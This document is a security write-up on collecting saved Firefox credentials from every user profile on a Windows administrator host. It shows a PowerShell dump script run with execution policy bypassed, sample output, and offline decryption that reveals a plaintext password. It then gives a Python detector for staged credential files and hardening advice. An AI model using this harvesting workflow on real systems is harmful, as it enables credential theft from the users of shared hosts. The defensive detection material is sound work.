Windows - Mozilla Firefox

When trying to gather additional credentials from, let's say, an Administrator Jump Host, extracting sensitive Mozilla Firefox files is a great approach. Doing this manually is boring and time-consuming, especially if there are hundreds of users under C:\Users.

To simplify this, I've made a simple PowerShell script, firefox_dump.ps1, that gathers all sensitive Mozilla Firefox information, which can later be decrypted using firefox_decrypt.py or similar.

The script should be run as a high-privileged user to gather as much information as possible.

Example Usage

PS E:\devop-scripts> powershell.exe -ExecutionPolicy Bypass .\firefox_dump.ps1
[-] 'Public' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'user' to: C:\Users\void\AppData\Local\Temp\user\firefox\ahf32hh2.default-release
[+] Dumping secrets from 'user2' to: C:\Users\void\AppData\Local\Temp\user2\firefox\plhh3lmm.default-release
[-] 'user3' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'void' to: C:\Users\void\AppData\Local\Temp\void\firefox\plmxz1zm.default-release

If you don't want to upload files to the target host, it's possible to simply copy-paste the try-catch code from the script and run it as is in PowerShell.

┌──(void㉿void)-[/opt/firefox_decrypt]
└─$ ./firefox_decrypt.py /tmp/firefox-loot/user1            

Website:   http://localhost:8000
Username: 'dev-user'
Password: 'D3velopm3ntM@st3rK3y*!'
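
On the defensive side, the staging paths in the Example Usage output are a usable detection signal. The following is an added example (not part of firefox_dump.ps1 or firefox_decrypt.py) that flags Firefox credential files written outside a real profile directory. It assumes the copied files include logins.json and key4.db and that file-creation telemetry with Sysmon Event ID 11 style fields (Image, TargetFilename) is available; the events are constructed samples.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumption: logins.json (saved logins) and key4.db (key store) are among the copied files.
CREDENTIAL_FILES = {"logins.json", "key4.db"}
# Default per-user Firefox profile location on Windows, as lower-cased path parts.
PROFILE_MARKER = ("appdata", "roaming", "mozilla", "firefox", "profiles")


def in_firefox_profile(path: PureWindowsPath) -> bool:
    """True if the path lies under ...\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles."""
    parts = [p.lower() for p in path.parts]
    n = len(PROFILE_MARKER)
    return any(tuple(parts[i:i + n]) == PROFILE_MARKER for i in range(len(parts) - n + 1))


def find_staged_profiles(events):
    """Map directory -> {files, images} for credential files created outside a profile."""
    hits = defaultdict(lambda: {"files": set(), "images": set()})
    for ev in events:
        target = PureWindowsPath(ev["TargetFilename"])
        if target.name.lower() not in CREDENTIAL_FILES or in_firefox_profile(target):
            continue
        entry = hits[str(target.parent)]
        entry["files"].add(target.name.lower())
        entry["images"].add(PureWindowsPath(ev["Image"]).name.lower())
    # Require both files in one directory: a lone key4.db copy is much noisier.
    return {d: e for d, e in hits.items() if e["files"] == CREDENTIAL_FILES}


# Constructed sample events, modelled on the staging paths shown above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\void\AppData\Local\Temp"
SAMPLE_EVENTS = [
    # Normal browser activity inside the real profile: ignored.
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles"
                       r"\ahf32hh2.default-release\logins.json"},
    # Both credential files copied into a Temp staging directory: flagged.
    {"Image": PS, "TargetFilename": TEMP + r"\user\firefox\ahf32hh2.default-release\logins.json"},
    {"Image": PS, "TargetFilename": TEMP + r"\user\firefox\ahf32hh2.default-release\key4.db"},
    # Only one of the two files in this directory: not flagged.
    {"Image": PS, "TargetFilename": TEMP + r"\notes\key4.db"},
]

if __name__ == "__main__":
    for directory, info in find_staged_profiles(SAMPLE_EVENTS).items():
        print(f"[!] Firefox credential files staged in {directory} by {sorted(info['images'])}")
```

Setting a Firefox Primary Password on shared hosts adds a second barrier, since copied profile files then cannot be decrypted without it.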
